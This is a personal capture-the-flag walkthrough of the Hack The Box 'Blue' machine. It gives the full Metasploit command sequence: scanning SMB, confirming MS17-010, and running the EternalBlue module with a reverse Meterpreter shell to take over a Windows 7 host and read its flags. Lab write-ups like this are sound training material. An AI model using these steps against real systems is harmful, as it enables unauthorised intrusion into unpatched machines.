I’ve just completed a walkthrough of the “Blue” machine on Hack The Box, which marks the end of the beginner track for me! If you’re following along, I’ve got the “Lame” machine walkthrough linked on my channel, so you can finish the whole track too.
Machine Name : HackTheBox Blue
Difficulty: Easy
Demonstrated Concept: Exploiting Windows through Eternal Blue Vulnerability.
My Approach to the “Blue” Machine
1. Initial Reconnaissance (Nmap Scan)
I kicked things off with an Nmap scan to scout for open ports and services on the target machine.
- Command Used:
nmap -sV -sC [IP_ADDRESS]
The scan immediately highlighted several open ports, many of which were related to SMB (Server Message Block), specifically ports 135, 139, and 445. The Nmap results were quite telling: SMBv1 was enabled, and the target was running Windows 7 Professional Service Pack 1. This combination screamed “EternalBlue vulnerability” to me!
2. Enumerating SMB with Metasploit 🔍
Even if I hadn’t known about EternalBlue, the logical next step after the Nmap scan would be to dig deeper into SMB. So, I fired up Metasploit.
I started by searching for SMB-related auxiliary modules:
- Command Used:
search name:smb type:auxiliary
I found a module that could check for the MS17-010 vulnerability (which EternalBlue exploits).
- Module Used:
auxiliary/admin/smb/ms17_010_command
- Commands Used:
use auxiliary/admin/smb/ms17_010_command
info
show options
set rhosts [IP_ADDRESS]
run
This initial check indicated that MS17-010 was likely exploitable. To confirm, I then used a more specific scanner module:
- Module Used:
auxiliary/scanner/smb/smb_ms17_010
- Commands Used:
use auxiliary/scanner/smb/smb_ms17_010
info
show options
set rhosts [IP_ADDRESS]
run
The output clearly confirmed: “Host is likely vulnerable to MS17-010.”
3. Exploiting with EternalBlue in Metasploit
With the vulnerability confirmed, it was time for the exploit. I searched for an exploit module:
- Command Used:
search type:exploit name:smb
Then, I selected the EternalBlue exploit module:
- Module Used:
exploit/windows/smb/ms17_010_eternalblue
- Commands Used:
use exploit/windows/smb/ms17_010_eternalblue
show options
set rhosts [IP_ADDRESS]
I also needed to set my local host IP for the reverse shell:
- Command Used to Check My IP:
ip a
- Command Used to Set Local Host:
set lhost [MY_IP_ADDRESS]
- Command Used to Run Exploit:
exploit
4. Troubleshooting the Exploit 🐛
The exploit didn’t work immediately. It connected and triggered the vulnerability but failed to establish a Meterpreter session, showing errors about “triggering free of corrupted buffer.” Even after Metasploit tried increasing “groom allocations,” it still failed.
I double-checked if the target machine was still online:
- Command Used:
ping [IP_ADDRESS]
(It was responsive).
Reviewing the module options, I realized I hadn’t explicitly set the target operating system.
- Command Used to Show Targets:
show targets
- Command Used to Set Target:
set target 1
(Target 1 was Windows 7). - Command Used to Confirm Options:
show options
- Command Used to Rerun Exploit:
run
Even with the target set, the exploit continued to fail. The issue seemed to be “sending egg to corrupted connection.” My final troubleshooting step was to reset the target machine on Hack The Box.
5. Successful Exploitation and Post-Exploitation 🎉
After resetting the machine, I ran the exploit again (with lhost
, rhosts
, and target 1
all set).
- Command Used:
exploit
This time, success! I got a Meterpreter session. From there, I dropped into a command shell:
- Command Used:
shell
Finally, I navigated to find the user and root flags:
- Commands Used:
dir
cd Users
dir
(This showed “Administrator” and “harris” user directories)cd harris
type user.txt
(To retrieve the user flag)
I knew the root flag would be in the Administrator’s directory, which I had already captured in a previous attempt.
And that’s how I compromised the “Blue” machine using the EternalBlue exploit! This officially wraps up the beginner track on Hack The Box for me, although I still need to submit one flag for “Lame” to hit 100% completion. I’m excited to see which track I’ll dive into next!